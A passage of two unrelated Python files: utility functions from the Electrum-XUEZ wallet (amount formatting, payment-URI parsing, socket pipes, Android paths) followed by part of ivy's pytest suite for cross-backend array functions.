sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_headers_file_name():
from bitcoin import TESTNET
s = 'blockchain_headers'
if TESTNET:
s += '_testnet'
return s
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum-xuez.electrum-xuez'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-xuez'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + android_headers_file_name()
old_headers_path = old_electrum_dir + android_headers_file_name()
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-xuez")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-XUEZ")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-XUEZ")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'xuez.donkeypool.com': ('https://xuez.donkeypool.com',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Xuez.org': ('https://test.insight.xuez.siampm.com',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'xuez.donkeypool.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Xuez address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'xuez':
raise BaseException("Not a Xuez URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Xuez address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='xuez', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
def utfify(arg):
"""Convert unicode argument to UTF-8.
Used when loading things that must be serialized.
"""
if isinstance(arg, dict):
return {utfify(k): utfify(v) for k, v in arg.items()}
elif isinstance(arg, list):
return map(utfify, arg)
elif isinstance(arg, str):
return arg.encode('utf-8')
return arg
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
test_general.py
|
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
def test_get_referrers_recursive(dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: work out why this test fails in wrapped mode
pytest.skip()
class SomeClass:
def __init__(self):
self.x = [1, 2]
self.y = [self.x]
some_obj = SomeClass()
refs = ivy.get_referrers_recursive(some_obj.x)
ref_keys = refs.keys()
assert len(ref_keys) == 3
assert 'repr' in ref_keys
assert refs['repr'] == '[1,2]'
y_id = str(id(some_obj.y))
y_refs = refs[y_id]
assert y_refs['repr'] == '[[1,2]]'
some_obj_dict_id = str(id(some_obj.__dict__))
assert y_refs[some_obj_dict_id] == 'tracked'
dict_refs = refs[some_obj_dict_id]
assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
some_obj_id = str(id(some_obj))
some_obj_refs = dict_refs[some_obj_id]
assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.array)
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.copy_array)
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
# mxnet does not support int16, and does not support bool for broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.array_equal)
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.array_equal)
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.equal)
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_numpy)
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_scalar)
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_list)
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.shape)
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.shape)
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.minimum)
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.maximum)
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.clip)
# clip_vector_norm
@pytest.mark.parametrize(
"x_max_norm_n_p_val_clipped",
[(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
max_norm = x_max_norm_n_p_val_clipped[1]
p_val = x_max_norm_n_p_val_clipped[2]
clipped = x_max_norm_n_p_val_clipped[3]
ret = ivy.clip_vector_norm(x, max_norm, p_val)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (x.shape if len(x.shape) else (1,))
# value test
assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# compilation test
if call is helpers.torch_call:
# pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.clip_vector_norm)
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.round)
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
